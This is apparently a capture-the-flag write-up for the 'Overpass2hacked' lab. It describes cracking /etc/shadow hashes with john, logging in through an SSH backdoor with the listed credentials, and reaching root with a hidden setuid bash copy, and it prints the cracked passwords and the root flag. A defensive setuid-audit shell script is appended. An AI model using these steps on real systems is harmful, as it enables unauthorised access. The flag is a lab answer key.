Overpass2hacked
Examine capture file
Copy hashes from /etc/shadow for offline cracking with fasttrack.txt in john.
Found 4 passwords:
• secret12 (bee)
• abcd123 (szymex)
• 1qaz2wsx (muirland)
• secuirty3 (paradox)
Initial access
The hacker left a backdoor on SSH port 2222.
Username: james
Password: november16
Enumeration
Got kernel version
uname -a
Search for Linux Kernel 4.15 exploits
$ searchsploit linux 4.15
Look around the file system
Abusing .suid_bash
james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# whoami
root
.suid_bash-4.4# cd /root
.suid_bash-4.4# ls
root.txt
.suid_bash-4.4# cat root.txt
thm{d53b2684f169360bb9606c333873144d}
Root flag: thm{d53b2684f169360bb9606c333873144d}
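
A defender's view of the .suid_bash step above, as an added example that is not part of the original writeup: a POSIX shell function that audits a directory tree for setuid files that are hidden or are byte-identical copies of a shell. The function name `audit_suid` and the `KNOWN_SHELLS` default list are assumptions made for this example.

```shell
#!/bin/sh
# Added example: audit a directory tree for setuid files that are hidden
# or are byte-for-byte copies of a shell (the pattern behind .suid_bash).
# KNOWN_SHELLS is an assumed default list; override it for your system.
KNOWN_SHELLS="${KNOWN_SHELLS:-/bin/sh /bin/bash /bin/dash /bin/zsh}"

# Print one finding per line: "<reason> uid=<owner-uid> <path>"
audit_suid() {
    root_dir="$1"
    # -xdev: stay on one filesystem; -perm -4000: setuid bit is set
    find "$root_dir" -xdev -type f -perm -4000 -print 2>/dev/null |
    while IFS= read -r f; do
        reason=""
        # A setuid file whose content equals a shell hands its owner's
        # privileges to anyone who can execute it (bash keeps them only
        # when started with -p).
        for sh_path in $KNOWN_SHELLS; do
            if [ -f "$sh_path" ] && cmp -s "$f" "$sh_path"; then
                reason="shell-copy"
                break
            fi
        done
        # Dot-prefixed setuid files do not show up in a plain `ls`.
        if [ -z "$reason" ]; then
            case "$(basename "$f")" in
                .*) reason="hidden-suid" ;;
            esac
        fi
        [ -n "$reason" ] || continue
        owner_uid=$(ls -ln "$f" | awk '{print $3}')
        printf '%s uid=%s %s\n' "$reason" "$owner_uid" "$f"
    done
}

# Typical use during triage: audit_suid /home ; audit_suid /tmp
```

A finding with uid=0 in a user's home directory is the case shown in this writeup; comparing results against a baseline of the distribution's packaged setuid binaries keeps the output short.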